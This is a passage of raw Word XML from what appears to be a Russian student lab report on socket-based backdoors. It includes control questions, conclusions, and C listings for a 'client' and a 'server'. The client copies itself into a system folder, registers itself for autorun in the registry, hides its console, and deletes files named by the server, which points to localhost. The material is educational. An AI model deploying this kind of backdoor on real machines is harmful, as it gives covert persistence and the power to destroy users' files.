        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00D40805">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>отказа в обслуживании</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>», например, для предложения пользователям снова установить продукт компании.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926C6D1" w14:textId="4572F127" w:rsidR="00F41D65" w:rsidRDefault="00F41D65" w:rsidP="00F41D65">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41D65">
        <w:t>Каким образом можно удалить процесс программы-клиента из списка задач Диспетчера задач?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583FB376" w14:textId="57EC8E87" w:rsidR="00A10DB5" w:rsidRPr="00A10DB5" w:rsidRDefault="00A10DB5" w:rsidP="00A10DB5">
      <w:r w:rsidRPr="00D40805">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Вызвать Диспетчер задач</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (через поиск или с помощью горячих клавиш </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shift</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10DB5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10DB5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Esc</w:t>
      </w:r>
      <w:r w:rsidRPr="00A10DB5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D40805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Нужно в</w:t>
      </w:r>
      <w:r w:rsidRPr="00D40805">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ыдел</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ить</w:t>
      </w:r>
      <w:r w:rsidRPr="00D40805">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> процесс, и в нижнем правом углу появляется активируется кнопка “Снять задачу”. После нажатия задача перестает быть активной. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AC2124" w14:textId="295C9E17" w:rsidR="00F017C2" w:rsidRDefault="00F41D65" w:rsidP="00F017C2">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41D65">
        <w:t xml:space="preserve">Опишите схему работы потайного хода, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F41D65">
        <w:t>используюшего</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F41D65">
        <w:t xml:space="preserve"> для удаленного управления </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F41D65">
        <w:t>Telnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F41D65">
        <w:t>-сервер.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02305B88" w14:textId="0C3F5B54" w:rsidR="00F017C2" w:rsidRDefault="00F017C2" w:rsidP="00984E4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="00F017C2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> - это сетевой протокол, используемый для обеспечения интерфейса командной строки для связи с устройством. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F017C2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F017C2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> чаще всего используется для </w:t>
      </w:r>
      <w:r w:rsidRPr="00F017C2">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">удаленного управления, а также иногда для начальной настройки некоторых устройств, особенно сетевого оборудования. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F4CB3" w14:textId="7A14B2E4" w:rsidR="00F017C2" w:rsidRPr="00F017C2" w:rsidRDefault="00F017C2" w:rsidP="00984E4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Многие протоколы TCP/IP, такие как HTTP, позволяют передавать файлы на сервер и с сервера. Вместо этого протокол </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Telnet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> позволяет войти на сервер, предоставляя прямой контроль и все те же права на файлы и приложения, что и пользователь, под которым </w:t>
      </w:r>
      <w:r w:rsidR="00984E4E">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>был выполнен вход.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1870FD9D" w14:textId="3CAB23E7" w:rsidR="00C93DCC" w:rsidRPr="00C93DCC" w:rsidRDefault="00C93DCC" w:rsidP="0095140C">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>Выводы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51727EC9" w14:textId="2BD35E5A" w:rsidR="00F032D1" w:rsidRDefault="00A11B14" w:rsidP="00F032D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работы были получены знания по реализации потайных ходов с помощью сокетов. </w:t>
      </w:r>
      <w:r w:rsidR="00C00B4D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Были реализованы программы сервера и клиента</w:t>
      </w:r>
      <w:r w:rsidR="00105477">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F032D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Были получены навыки работы с сетевыми портами и реестром. Было потрачено много времени на изучение структуры реестра и функций, реализующих автозапуск</w:t>
      </w:r>
      <w:r w:rsidR="002B4EAC">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F032D1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">программы клиента. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D22ACB" w14:textId="651C6735" w:rsidR="003E0B27" w:rsidRDefault="0036331B" w:rsidP="003E0B2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5D3951">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">При разработке данных программ </w:t>
      </w:r>
      <w:r w:rsidR="00B12380">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">были </w:t>
      </w:r>
      <w:r w:rsidR="005A5D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">изучены </w:t>
      </w:r>
      <w:r w:rsidR="00B86148">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>очен</w:t>
      </w:r>
      <w:r w:rsidR="000C7287">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ь важные методы защиты против потайных ходов</w:t>
      </w:r>
      <w:r w:rsidR="008550E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008550E9" w:rsidRPr="008550E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008550E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>о существовании которых знает не каждый пользователь.</w:t>
      </w:r>
      <w:r w:rsidR="00516743">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Было выяснено, какие опасности </w:t>
      </w:r>
      <w:r w:rsidR="00A61BC4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">скрываются </w:t>
      </w:r>
      <w:r w:rsidR="00356BD3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>за</w:t>
      </w:r>
      <w:r w:rsidR="008550E9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> программами, реализующими потайных ходы.</w:t>
      </w:r>
      <w:r w:rsidR="005A5D30" w:rsidRPr="005A5D30">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F93B01" w14:textId="77777777" w:rsidR="00F032D1" w:rsidRDefault="00F032D1" w:rsidP="008550E9">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64FA19E7" w14:textId="77777777" w:rsidR="005D3951" w:rsidRDefault="005D3951" w:rsidP="005D3951">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63FAB25C" w14:textId="7FFB2313" w:rsidR="00E27E1E" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:pStyle w:val="af8"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F16816" w14:textId="0E694E86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78F628DE" w14:textId="0D26BF40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9817B8E" w14:textId="67DEF71F" w:rsidR="00E27E1E" w:rsidRPr="00FD038F" w:rsidRDefault="00E27E1E" w:rsidP="00311EBF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACF1BD6" w14:textId="77777777" w:rsidR="00311EBF" w:rsidRPr="00FD038F" w:rsidRDefault="00311EBF" w:rsidP="00311EBF">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FBB4C61" w14:textId="77777777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778A7B6" w14:textId="77777777" w:rsidR="00F40188" w:rsidRDefault="00F40188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4BBA78C1" w14:textId="77777777" w:rsidR="00F40188" w:rsidRDefault="00F40188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486235D0" w14:textId="77777777" w:rsidR="00F40188" w:rsidRDefault="00F40188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E240035" w14:textId="77777777" w:rsidR="00F40188" w:rsidRDefault="00F40188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C926488" w14:textId="77777777" w:rsidR="00F40188" w:rsidRDefault="00F40188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411ACC2B" w14:textId="77777777" w:rsidR="00F40188" w:rsidRDefault="00F40188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3871092" w14:textId="77777777" w:rsidR="00D740EB" w:rsidRDefault="00D740EB" w:rsidP="00D740EB">
      <w:pPr>
        <w:pStyle w:val="af8"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc35945238"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ПРИЛОЖЕНИЕ А</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3F937A9E" w14:textId="08940058" w:rsidR="00D740EB" w:rsidRPr="00C8104B" w:rsidRDefault="00D740EB" w:rsidP="00D740EB">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00A62693">
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8104B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62693">
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8104B">
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidR="00984E4E">
        <w:t>Клиент</w:t>
      </w:r>
      <w:r w:rsidRPr="00C8104B">
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43390E23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_CRT_SECURE_NO_WARNINGS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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE03B5D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_WINSOCK_DEPRECATED_NO_WARNINGS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разрешает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использовать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устаревшие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winsock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-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функции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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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inet_addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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и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пр</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B52592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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2132ABBF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stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2FF386FE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&lt;winsock2.h&gt;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сокеты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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E987D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dos.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757CC18F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winreg.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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работа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реестром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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1A7619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#pragma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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comment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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lib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"ws2_32.lib"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)  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подключаем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библиотеку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сокетов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68316D5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4B3C1DF6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Port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1234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    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C56362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IP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"127.0.0.1"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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7268D44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AA3AA2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Функция добавления программы в автозагрузку и копирования в системную папку</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C2E98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Autorun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5786316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</w:rPr>
        <w:t>DWORD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Path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             // будет хранить длину пути к текущему </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5221B67F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</w:rPr>
        <w:t>TCHAR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IpFilename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</w:rPr>
        <w:t>MAX_PATH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{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};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// буфер для пути к себе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726318ED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</w:rPr>
        <w:t>HKEY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hKey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                  // дескриптор ключа реестра</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0206D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A8D7D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GetModuleFileName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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возвращает полный путь к исполняемому файлу процесса</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CBEDF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((Path = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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GetModuleFileName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IpFilename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MAX_PATH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)) ==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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E36F9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"Error getting the path\n"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D3BDF80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CF9F277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BD78537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Копируем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себя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в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C:\\Windows\\temp\\Client.exe </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561E5B7B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CopyFile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IpFilename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L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"C:\\Windows\\temp\\Client.exe"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5A868FB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8D04339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Открываем ключ автозагрузки для текущего пользователя (HKCU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF939C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RegOpenKeyEx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HKEY_CURRENT_USER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L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"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"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KEY_SET_VALUE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&amp;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)!=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ERROR_SUCCESS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){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BEA076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"Error opening registry key\n"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61EB213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RegCloseKey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2A2494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6E1585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E06187C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AE61D98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RegSetValueEx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L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"Client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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REG_SZ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BYTE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)L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"C:\\Windows\\temp\\Client.exe"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Path * </w:t>
      </w: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(*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IpFilename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)) !=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ERROR_SUCCESS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90A342D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"Error when creating a parameter or assigning a value to it\n"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78061A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RegCloseKey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32F7CE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FD7114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8BE40C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RegCloseKey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hKey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5C7314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EXIT_SUCCESS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5B9A890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E84724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A200E9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main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB9A2E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Пытаемся прописать себя в автозагрузку (если не получилось — программа завершится)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6B7D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(Autorun() ==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DB6B65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</w:p>
    <w:p w14:paraId="257E63F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CCE3A0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Скрываем окно консоли (но процесс всё равно виден в диспетчере задач)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94C79B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HWND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HWnd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GetConsoleWindow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7CBA4D76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ShowWindow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HWnd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SW_HIDE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23AA500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ED8B1A9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WSADATA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Ws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</w:p>
    <w:p w14:paraId="0A24973C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= {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38CA8F9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DeletionError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= {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"Deletion error"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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2A569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Successful[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= {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"The deletion was successful"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70C0910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68871E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Инициализация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Winsock (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версия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2.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B86021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WSAStartup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MAKEWORD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 &amp;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Ws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3F0AB9B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"Error WinSock version </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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initializaion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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982A1E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38901C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A158B8D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Создание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TCP-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сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279787C6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SOCKET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Socket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socket(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AF_INET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SOCK_STREAM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B4091F7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(Socket ==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INVALID_SOCKET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72CA52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"Error initialization socket"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6C946F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closesocket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(Socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3BA81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406EC1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89BE05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Настройка адреса сервера (локальный хост, порт 1234)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF9FCB7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SOCKADDR_IN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</w:p>
    <w:p w14:paraId="7760B82B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memset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(&amp;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54863298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SockAddr.sin_family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AF_INET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B4FDD7E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SockAddr.sin_port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htons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Port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1F0F050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SockAddr.sin_addr.S_un.S_addr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inet_addr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IP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33FCFC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211FCC7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Бесконечная попытка подключения (блокирует выполнение)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571B2AB8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(connect(Socket, (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struct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524AA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*)&amp;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)) ==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SOCKET_ERROR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842B92C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2C6AF24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// Основной цикл: получаем имя файла - удаляем - отправляем результат</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B39CFF8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{ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EC3968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recv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(Socket,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ждём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путь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от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сервера</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28631C3B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strcmp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524AA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"Exit"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==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break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   //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команда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выхода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3EC7EA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>remove</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C524A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возвращает 0 при успехе, иначе !=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C885CF5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(remove(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)) send(Socket,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DeletionError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DeletionError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663141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else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send(Socket, Successful, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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(Successful), </w:t>
      </w:r>
      <w:r w:rsidRPr="00C524AA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205D41F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4A7A472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closesocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(Socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5C7490" w14:textId="77777777" w:rsidR="00C524AA" w:rsidRPr="00C524AA" w:rsidRDefault="00C524AA" w:rsidP="00C524AA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524AA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524AA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EXIT_SUCCESS</w:t>
      </w:r>
      <w:r w:rsidRPr="00C524A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4596B4F" w14:textId="3319154C" w:rsidR="00FD038F" w:rsidRDefault="00C524AA" w:rsidP="00C524AA">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C524A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172D93D" w14:textId="6CA07FF2" w:rsidR="00E27E1E" w:rsidRDefault="00E27E1E" w:rsidP="00E1439F">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A62693">
        <w:lastRenderedPageBreak/>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27E1E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62693">
        <w:t>программы</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27E1E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r>
        <w:t>Сервер</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27E1E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561924B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_CRT_SECURE_NO_WARNINGS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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA399D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_WINSOCK_DEPRECATED_NO_WARNINGS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//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разрешает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использовать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устаревшие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winsock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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-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функции</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850A60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stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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38FDBF0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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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7996EFCB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&lt;winsock2.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7A470B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#pragma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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>comment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FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lib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, 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"ws2_32.lib"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)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подключаем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библиотеку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сокетов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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404340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504DECBA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Port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1234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                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587F8E22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07CA42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main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B1C13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2B91AF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>WSADATA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Ws;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164EF19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Res[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{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};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 // буфер для ответа от клиента (успех/ошибка удаления)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D960830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{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};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// буфер для имени файла, который введёт пользователь</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC50257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F78279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Инициализация </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Winsock</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(версия 2.2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39551EA5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WSAStartup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</w:rPr>
        <w:t>MAKEWORD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), &amp;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Ws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)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11856CB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"Error WinSock version </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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initializaion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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6A995D5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2E5D9ED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6E65939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DF9D0E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Создание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TCP-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сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D0D94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SOCKET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socket(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AF_INET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SOCK_STREAM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); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2B85A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(Socket ==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INVALID_SOCKET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6B2446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"Error initialization socket"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FF83317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closesocket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(Socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCCA7E3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9518197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6E5345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215566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Настройка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адреса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сервера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: IPv4,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порт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1234,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любой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доступный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IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F953D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SOCKADDR_IN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02D2260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memset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(&amp;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7E8C6ED9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SockAddr.sin_family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AF_INET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</w:p>
    <w:p w14:paraId="6C8580F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SockAddr.sin_port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htons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Port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8B0EFE0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bind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привязан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к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сокету</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EF391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bind(Socket, (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struct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*)&amp;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726F1E72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BEFE07E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// Переводим сокет в режим ожидания подключений (очередь до 1 клиента)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C841CF6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(listen(Socket,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==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SOCKET_ERROR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357E56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"Listen failed\n"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E07962D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closesocket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(Socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4419115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Error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0BA2985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0D785AB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72FCD5B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SOCKET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FE60CE6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SOCKADDR_IN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789C2AD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ClientSASize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AFE28B6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"Waiting for connection...\n"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36C9AFE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882EA0D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accept(Socket, (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struct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026D3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*)&amp;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ClientSockAddr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&amp;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ClientSASize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1159BE28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"The connection is established\n"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AE0B84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A0B75E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B62803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// Основной цикл общения с клиентом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B29A473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796B3CE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memset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1B7CD27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"Enter the file name. If you want to exit the program, write \"Exit\":\n"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EA3A110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</w:p>
    <w:p w14:paraId="0666974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(gets(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==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EXIT_FAILURE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8C5C4E0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</w:p>
    <w:p w14:paraId="461E8F8E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strcmp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"Exit"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==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D760DA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Отправляем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команду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завершения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(5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байт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: 'E','x','</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007026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','t','\0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7B6E8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send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ClientSocket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026D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Exit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
